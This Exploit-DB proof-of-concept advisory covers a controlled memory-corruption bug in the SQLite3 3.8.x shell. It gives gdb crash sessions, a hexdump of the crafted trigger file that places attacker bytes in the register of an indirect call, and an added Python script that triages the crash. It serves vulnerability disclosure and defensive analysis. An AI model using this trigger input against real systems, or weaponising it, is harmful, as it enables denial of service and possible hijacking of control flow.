SQLite3 3.8.6 - Controlled Memory Corruption (PoC)

EDB-ID: 36190
Type: dos
Platform: Linux
Date: 2015-02-26


# Exploit Title: SQLite3 controlled memory corruption PoC (0day)
# Date: [date]
# Exploit Author: Andras Kabai
# Vendor Homepage: http://www.sqlite.org/
# Software Link: http://www.sqlite.org/download.html
# Version: 3.8.6, 3.8.8.3
# Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code)

Using crafted input (for example a malicious file supplied via the “-init” parameter, or fed directly to the program's standard input) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. Because the corrupted memory is attacker-controlled, the program flow could be manipulated by the attacker.

The following sections demonstrate the attack against the sqlite3 installed and updated via apt-get, and against a newer version built from source.

====

andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3
/usr/bin/sqlite3
andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version
3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e
andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) set args < sqlitepoc.txt
(gdb) r
Starting program: /usr/bin/sqlite3 < sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0
(gdb) i r
rax            0x138	312
rbx            0x41414141424242	18367622009733698
rcx            0x7fffffffb590	140737488336272
rdx            0x0	0
rsi            0x555555779b43	93824994483011
rdi            0x41414141424242	18367622009733698
rbp            0x555555779b43	0x555555779b43
rsp            0x7fffffffb4c0	0x7fffffffb4c0
r8             0x555555779b41	93824994483009
r9             0x6c	108
r10            0x0	0
r11            0x0	0
r12            0x555555779b48	93824994483016
r13            0x7fffffffb590	140737488336272
r14            0x555555779b40	93824994483008
r15            0x2	2
rip            0x7ffff7ba06a0	0x7ffff7ba06a0 <sqlite3_load_extension+736>
eflags         0x10246	[ PF ZF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa:
=> 0x00007ffff7ba06a0 <sqlite3_load_extension+736>:	call   QWORD PTR [rbx+0x48]
   0x00007ffff7ba06a3 <sqlite3_load_extension+739>:	mov    r15,rax
   0x00007ffff7ba06a6 <sqlite3_load_extension+742>:	lea    rax,[rip+0x12bc1]        # 0x7ffff7bb326e
End of assembler dump.

===

andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version
3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b
andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./lt-sqlite3...done.
(gdb) set disassembly-flavor intel
(gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt
(gdb) r
Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off

Program received signal SIGSEGV, Segmentation fault.
sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169
36169	      }
(gdb) i r
rax            0x138	312
rbx            0x41414141424242	18367622009733698
rcx            0x7fffffffb510	140737488336144
rdx            0x0	0
rsi            0x6261c3	6447555
rdi            0x41414141424242	18367622009733698
rbp            0x6261c3	0x6261c3
rsp            0x7fffffffb440	0x7fffffffb440
r8             0x6261c1	6447553
r9             0x6c	108
r10            0x7fffffffb270	140737488335472
r11            0x7ffff7b5ae50	140737349267024
r12            0x6261c8	6447560
r13            0x7fffffffb510	140737488336144
r14            0x6261c0	6447552
r15            0x2	2
rip            0x7ffff7b5b130	0x7ffff7b5b130 <sqlite3_load_extension+736>
eflags         0x10246	[ PF ZF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a:
=> 0x00007ffff7b5b130 <sqlite3_load_extension+736>:	call   QWORD PTR [rbx+0x48]
   0x00007ffff7b5b133 <sqlite3_load_extension+739>:	mov    r15,rax
   0x00007ffff7b5b136 <sqlite3_load_extension+742>:	lea    rax,[rip+0x587d8]        # 0x7ffff7bb3915
End of assembler dump.

====

andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt
00000000  3b 0a 2e 74 20 78 0a 2e  74 0a 77 68 61 74 65 76  |;..t x..t.whatev|
00000010  65 72 00 0a 3b 0a 2e 74  0a 2e 6f 70 0a 2e 6c 20  |er..;..t..op..l |
00000020  43 43 43 43 42 42 42 42  41 41 41 41 0a           |CCCCBBBBAAAA.|
0000002d
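What “controlled” means here can be checked mechanically from the artefacts on this page. The triage script below is an added example (the editor's, not part of the advisory or of SQLite): it rebuilds sqlitepoc.txt from the hexdump above, parses the crash frame line and an abridged copy of the register dump from the 3.8.8.3 session, and reports that the base register of the faulting `call QWORD PTR [rbx+0x48]` holds bytes copied verbatim from the argument of the `.l` line, and that the `db` handle printed in the frame lies 5 bytes inside the zFile string, so the first pointer-sized field read through it is exactly the value in rbx. The minimum match length and the assumption that the frame line can be treated as a flat string are the example's own; all inputs are copied from the page.

```python
"""Crash triage for the gdb sessions above (added example, not the advisory's code).

Answers "is the corruption input-controlled?" from the page's own artefacts:
the hexdump of sqlitepoc.txt, the 3.8.8.3 frame line, an abridged register
dump and the faulting instruction.
"""
import re

# hexdump -C of sqlitepoc.txt, copied from the page.
HEXDUMP = """\
00000000  3b 0a 2e 74 20 78 0a 2e  74 0a 77 68 61 74 65 76  |;..t x..t.whatev|
00000010  65 72 00 0a 3b 0a 2e 74  0a 2e 6f 70 0a 2e 6c 20  |er..;..t..op..l |
00000020  43 43 43 43 42 42 42 42  41 41 41 41 0a           |CCCCBBBBAAAA.|
0000002d
"""

# Crash frame and 'info registers' output from the 3.8.8.3 session (registers abridged).
FRAME = ('sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, '
         'zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169')
REGISTERS = """\
rax            0x138    312
rbx            0x41414141424242    18367622009733698
rcx            0x7fffffffb510    140737488336144
rsi            0x6261c3    6447555
rdi            0x41414141424242    18367622009733698
r12            0x6261c8    6447560
rip            0x7ffff7b5b130    0x7ffff7b5b130 <sqlite3_load_extension+736>
eflags         0x10246    [ PF ZF IF RF ]
"""
FAULTING_INSN = "call   QWORD PTR [rbx+0x48]"


def parse_hexdump(text):
    """Rebuild raw bytes from `hexdump -C` output (offset, hex bytes, |ascii| column)."""
    data = bytearray()
    for line in text.splitlines():
        m = re.match(r'^[0-9a-f]{8}\s+((?:[0-9a-f]{2}\s+)+)\|', line)
        if m:                      # the trailing offset-only line does not match
            data += bytes.fromhex(m.group(1).replace(' ', ''))
    return bytes(data)


def shell_lines(data):
    """Input split into lines; an embedded NUL ends the C string the shell parses."""
    return [ln.split(b'\x00', 1)[0] for ln in data.split(b'\n') if ln]


def parse_registers(text):
    """Map register name -> integer value from `info registers` output."""
    regs = {}
    for line in text.splitlines():
        m = re.match(r'^(\w+)\s+(0x[0-9a-f]+)', line)
        if m:
            regs[m.group(1)] = int(m.group(2), 16)
    return regs


def input_controlled(regs, data, min_len=4):
    """Registers whose little-endian bytes (trailing NULs stripped) occur verbatim
    in the input. min_len (assumed) filters spurious matches on short values."""
    hits = {}
    for name, value in regs.items():
        if name == 'eflags':
            continue
        raw = value.to_bytes(8, 'little').rstrip(b'\x00')
        if len(raw) >= min_len and raw in data:
            hits[name] = raw
    return hits


def struct_overlap(frame_line):
    """Where `db` lies relative to the zFile string, and what an 8-byte pointer
    field read at `db` would contain if that memory holds the string."""
    m = re.search(r'zFile=(0x[0-9a-f]+) "([^"]*)", db=(0x[0-9a-f]+)', frame_line)
    zfile, text, db = int(m.group(1), 16), m.group(2).encode(), int(m.group(3), 16)
    offset = db - zfile
    if not 0 <= offset <= len(text):
        return offset, None            # db does not point into the string
    field0 = (text + b'\x00' * 8)[offset:offset + 8]
    return offset, int.from_bytes(field0, 'little')


def triage(hexdump=HEXDUMP, registers=REGISTERS, frame=FRAME, insn=FAULTING_INSN):
    data = parse_hexdump(hexdump)
    regs = parse_registers(registers)
    hits = input_controlled(regs, data)
    base = re.search(r'\[(\w+)', insn).group(1)   # base register of the indirect call
    offset, first_field = struct_overlap(frame)
    return {
        'input_len': len(data),
        'shell_lines': shell_lines(data),
        'controlled': hits,
        'call_base': base,
        'call_base_controlled': base in hits,
        'db_offset_in_zFile': offset,
        'first_field_at_db': first_field,
        'first_field_matches_base': first_field == regs.get(base),
    }


if __name__ == '__main__':
    for key, value in triage().items():
        print(f'{key}: {value!r}')
```

The two boolean fields are the verdict: the faulting indirect call goes through a register whose bytes came straight from the `.l` argument, and the `db` pointer the shell handed to `sqlite3LoadExtension` aliases the filename buffer, which is why the first field read through it is those same bytes. For a defender that distinction matters: a crash whose dereferenced base register can be matched byte-for-byte against the input is a potential control-flow primitive rather than a plain denial of service, and should be prioritised and patched as such.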